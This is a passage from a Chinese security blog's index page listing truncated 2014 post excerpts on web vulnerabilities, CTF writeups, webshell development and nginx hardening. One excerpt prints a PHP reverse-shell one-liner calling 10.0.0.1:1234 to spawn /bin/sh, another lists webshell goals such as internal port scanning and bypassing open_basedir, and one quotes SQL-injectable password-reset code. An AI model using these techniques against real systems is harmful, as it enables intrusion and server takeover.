打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
离别歌

emlog某重要插件前台SQL注入+Getshell

作者: 分类: 网络安全 时间: 2014-11-12 16:37 评论: 0条评论 浏览: 6人看过 标签: 上传漏洞 getshell emlog插件

[该文章已设置加密,请点击标题输入密码访问]

关于lnmp目录禁止执行的绕过与正确方法

作者: 分类: 网络安全 时间: 2014-11-2 16:35 评论: 3条评论 浏览: 371人看过 标签: 阻止脚本运行 nginx

    无意中看到了这篇文章:http://www.freebuf.com/articles/system/49428.html

    对于下面我莫名其妙中枪的事。。。我就不多说了:

    

    于是我详细地把文章看了一遍,文章比较基础但也不失为一个引导新手的一个方法。但其中对于禁止执行的方式,我就不敢苟同了。在某种配置下,这个方法是能够很容易被绕过的。

    文中提到,使用lnmp1.1搭建的nginx环境,正好我的vps也是lnmp搭建的环境,所以我可以在我的vps里做实验。

    看到文中的解决方案:

    

    在location中,将匹配到/(avatar|uploads|ups)/.*\.(php|php5)?$的请求全部禁用掉。

    似乎是一个很好的方法,那我们怎么绕过?

...

阅读全文>>

个人版php webshell的一些功能

作者: 分类: PHP 时间: 2014-10-28 23:03 评论: 4条评论 浏览: 456人看过 标签: webshell php

    网上的webshell总结起来有一些缺陷:

    1.兼容性差,当某函数禁用后,该功能就不能用了。其实php是个很灵活的语言,很多功能是可以有很多实现方式的。

    2.功能单一,一般都只有常用的几个功能,不够好用。

    3.突破性不强,没用利用一些php、IIS、apache、nginx的CVE来达到一些特殊目的,比如绕过open_basedir、绕过安全模式等。

    4.别人写的自己不了解,维护起来不方便,免杀起来也不顺手。

    特别是第一点,和第二点,我想自己的webshell能够有更好的使用效果。webshell已经写了一半,除了常见功能。大概、我希望有如下一些比较好的:

    1.执行命令,囊括尽可能多的方法,和一些奇技淫巧

    2.获得内网IP,并能扫描内网端口

    3.利用...

阅读全文>>

php webshell下直接反弹shell(不借助任何其他语言)

作者: 分类: PHP 时间: 2014-10-27 18:43 评论: 0条评论 浏览: 279人看过 标签: webshell 反弹shell

    linux下,有时候拿到webshell需要提权,提权必须要得到一个交互式的shell。

    我看了一下常用的php webshell,对于命令执行、反弹shell都没有完善的方式。很多webshell里都没有proc_popen、popen这两种方式,特别是proc_popen,比如phpspy。

    在我收集的反弹shell集合(http://tool.p1ng.pw/getshell.html)中,有一个方法,就是在命令行中输入:

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
    但是有个问题,如果在webshell里执行如上代码的话,会把系统的标准输入输出重定向到/bin/sh里,导致php-fpm直接502,然后弹的shell也会瞬间掉了,这个方式比较粗鲁。而我的思路是:我只希望把我新创建的进程(/b...


阅读全文>>

XCTF两道web题目的writeup

作者: 分类: 网络安全 时间: 2014-10-25 14:59 评论: 14条评论 浏览: 1183人看过 标签: ctf writeup xctf

    只会web正好又是php的审计题目,于是就把两道题都做了。大牛们都忙着破各种路由器,破各种设备去了,我也侥幸得了个第一:

    

    第一题,没怎么截图,查看代码如下:

    

    主要是考mysql的一个trick。就是查询出来的$row['id']和$id的区别。这么说可能有点不明白,我们用一下代码fuzz一下mysql:

mysql_connect("localhost","root","root");mysql_select_db ("test");mysql_query("set names utf8");for($i = 0 ; $i < 256 ; $i++){	$c = chr($i);	$name = mysql_real_escape_string('hehe' . $c);	$sql = "SELECT * FROM...

阅读全文>>

遇到一个有趣的逻辑漏洞

作者: 分类: 网络安全 时间: 2014-10-17 19:32 评论: 1条评论 浏览: 460人看过 标签: Mysql 逻辑漏洞
遇到个有趣的逻辑漏洞,和大家分享一下。 
某系统数据库是mysql。user表有个code字段,类型是int(11),这个字段是保存一个随机数,用来找回密码的时候做验证,默认值是0。 
找回密码时候的步骤是,首先填写自己邮箱,接收重置密码的邮件,点击链接,访问如下代码: 
if (!empty($_GET['email']) && !empty($_GET['code'])) 

    if (!$db->count('user',"email='{$_GET['email']}' AND code='{$_GET['code']}'")) 
        die('error'); 
    $_SESSION['email'] = $_GET['email']; 
&n...

阅读全文>>

XDCTF2014 部分Writeup

作者: 分类: 网络安全 时间: 2014-10-5 1:43 评论: 6条评论 浏览: 938人看过 标签: writeup XDCTF

首先我代表我们XDCTF主办方对大家说声辛苦了,十一假期本该休息却依旧奋斗在CTF第一线。我是XDCTF2014的出题人之一,也是服务器的维护者之一,关于比赛不想说太多,有太多不可控制的因素。包括中途停电之类的事情,也备受吐槽。

这份writeup是几道web题目和一个加密解密的题目,我知识面比较窄,所以题目和writeup都不能面面俱到,有一些想法在心里却最后没能放出来,所以这里也就不提了。

 

WEB20

 

什么,小P说来点彩头?先出个简单的,就WEB20吧。

题目链接: WEB20

 

hint > 大家不知道复活节要玩什么吗?(非前端题,请勿关注html注释、css、javascript等)

 

WEB20是我很久以前就出好的一个题目,今年比赛特别多,不过一直没有被人家用上,所以就当个彩头送出来了,没想到还难倒了一批人。

考点是php彩蛋。只要运行PHP的服务器上,访问任何网页都可以在URL后添加以下字符串来查看信息:

...

阅读全文>>

Fuzz中的javascript大小写特性

作者: 分类: web前端 时间: 2014-9-21 1:28 评论: 3条评论 浏览: 645人看过 标签: javascript

    某比赛实在有点坑人,题目涉嫌抄袭不说,还不停改来改去。算了不吐槽了,说一则javascript小特性吧。

    toUpperCase()是javascript中将小写转换成大写的函数。toLowerCase()是javascript中将大写转换成小写的题目。但是这俩函数真的只有这两个功能么?

    不如我们来fuzz一下,看看toUpperCase功能如何?

if (!String.fromCodePoint) {	(function() {		var defineProperty = (function() {			// IE 8 only supports `Object.defineProperty` on DOM elements			try {				var object = {};				var $defineProperty = Object.defineProperty;				var result = $defineProperty(objec...


阅读全文>>

回忆phpcms头像上传漏洞以及后续影响

作者: 分类: 网络安全 时间: 2014-9-8 16:49 评论: 2条评论 浏览: 743人看过 标签: 上传漏洞 phpcms

暑假写的文章了,最近博客没干货,发出来娱乐一下。

为了响应爱慕锅(Mramydnei)、撸大师(索马里的海贼)、fd牛(/fd)的号召成立的parsec团队,以及各位老师多年来对我的教育,我要写篇回忆稿。看标题大家可能觉得,这陈芝麻烂谷子的事你还拿出来说啥。当然,我自己搓一点都无所谓,但怎么能丢了parsec的脸,各位还是且听我娓娓道来~


0×01 最初的phpcms头像上传getshell漏洞
不知道大家还记得phpcms曾经火极一时的头像上传漏洞不,因为这个漏洞,互联网上大量站点被黑,影响极为恶劣。
那件事以后我分析过漏洞才成因以及利用方法(http://www.leavesongs.com/PENETRATION/phpcms-upload-getshell.html),简单来说phpcms对头像上传是这么处理:上传上去的zip文件,它先解压好,然后删除非图片文件。
关键地方代码:

//存储flashpost图片  $filename = $dir.$this->uid.'.zip';  file_put_contents($filena...

阅读全文>>

lnmp虚拟机安全配置研究

作者: 分类: 网络安全 时间: 2014-8-23 17:42 评论: 3条评论 浏览: 820人看过 标签: 跨目录 nginx

    众所周知,虚拟主机的安全不好做,特别是防止跨站成为了重点。apache+php服务器防止跨站的方式比较简单,网上的所有成熟虚拟主机解决方案都是基于apache的,如directadmin、cpanel。

    但如今已然不是apache的时代了,在linux+nginx+mysql+php下怎么防止不同虚拟主机进行跨站?

    首先我们要清楚明白Nginx是怎么运行的,再考虑怎么具体操作吧。乌云知识库里有一篇很好的文章(http://drops.wooyun.org/tips/1323),介绍了nginx的安全配置,大家可以看看。

    nginx实际上只是一个反向代理服务器,它接收到请求以后会看当前请求是否是.php文件,如果是则转交给php-fpm来处理,获得结果后再发给用户。所以有两个权限需要考虑:第一是nginx的权限,第二是php-fpm的权限。如下图,nginx和php-fpm都要读取这个文件,所以权限分配是要考虑的重要一项。

...

阅读全文>>

  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7.   ...  
  8. 尾页
本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
centos7重启apache、nginx、mysql、php
centos6安装nginx+mysql+php
nginx安装配置详解
WDCP的报错处理
nginx+PHP+PHP-FPM(FastCGI)在Ubuntu上的安装和配置
CentOS7下部署开源网络监控系统LibreNMS
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服